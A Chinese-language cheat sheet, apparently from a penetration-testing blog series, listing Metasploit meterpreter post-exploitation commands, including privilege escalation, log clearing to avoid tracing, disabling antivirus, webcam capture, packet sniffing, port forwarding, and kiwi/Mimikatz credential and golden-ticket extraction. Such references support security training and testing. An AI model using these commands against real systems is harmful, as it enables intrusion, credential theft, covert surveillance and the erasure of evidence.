Metasploit框架(3), meterpreter 常用命令, sniffer流量监听, portfwd端口转发, kiwi, Mimikatz密码破解

Metasploit框架(3), meterpreter 常用命令与扩展工具

进入到 meterpreter > 提示符环境下才能执行命令

一, 常用命令

sysinfo     # 系统信息
getuid      # 当前用户
getprivs    # 当前权限
load priv   # 加载priv
getsystem   # 提权到系统权限
clearev     # 清除系统日志, 安全日志, 避免朔源
quit        # 关闭 meterpreter, 关闭 session 连接, 退回msf模块控制台
shell       # 反弹shell, 进入目标主机的命令行, 退回 meterpreter: exit
pwd         # 当前目标主机目录
lpwd        # 当前本地主机目录
ps          # 查看所有进程
kill        # 关闭进程
getpid      # 当前meterpreter注入的进程
migrate pid # 把meterpreter迁移到其他进程
screenshot  # 屏幕截图
webcam_list # 查看摄像头, `webcam_snap -i 1 -v false` 间隔1秒拍照
background  # 后台挂起 meterpreter, 临时退出meterpreter, 不关闭 session, 切换回msf模块控制台. 
            # 在msf控制台输入 sessions 查看所有已打开的session, 
            # 使用 `sessions -i 序号` 命令可以重新进入对应的 meterpreter 控制台.
run			# 执行后渗透攻击脚本, 输入两次tab显示所有脚本的提示. 比如:
			# `run post/windows/manage/killav`  关闭杀毒软件进程
			# `run vnc`  开启vnc远程连接
upload      # 上传文件, `upload /home/3389.ext c:\\Test\\` 将3389.exe上传到目标主机c盘
download	# 下载文件, `download drupal.sql /home/kali` 将drupal.sql下载到本地目录

二, 其他工具:

1. sniffer 流量监听工具
use sniffer        # 加载sniffer扩展模块
sniffer_interfaces # 列出网卡
sniffer_start 1    # 选择网卡开始抓包
sniffer_stats 1    # 查看状态
sniffer_dump 1 /tmp/a.pcap # 导出数据包, 可以通过wireshark分析.
sniffer_stop 1     # 停止抓包
2. portfwd 端口转发工具
portfwd list # 端口转发列表
portfwd add -l 1122 -p 2408 -r 127.0.0.1 # 将目标2408端口转发到本地系统1122端口.
3. kiwi (旧版名称: Mimikatz) 获取账户密码工具

注意: kiwi模块同时支持32位和64位的系统,但是该模块默认是加载32位的系统,所以如果目标主机是64位系统的话,直接默认加载该模块会导致很多功能无法使用。

所以如果目标系统是64位的,则必须先查看系统进程列表,然后将meterpreter进程迁移到一个64位程序的进程中,才能加载kiwi并且查看系统明文。

load kiwi # 加载工具
creds_all # 列出所有账户的凭证和明文密码.
password_change # 修改密码
wifi_list # 列出wifi配置
wifi_list_shared # 列出共享wifi配置/编码
golden_ticket_create # 创建黄金票据

你可能感兴趣的:(渗透测试-入侵提权,渗透测试,web安全)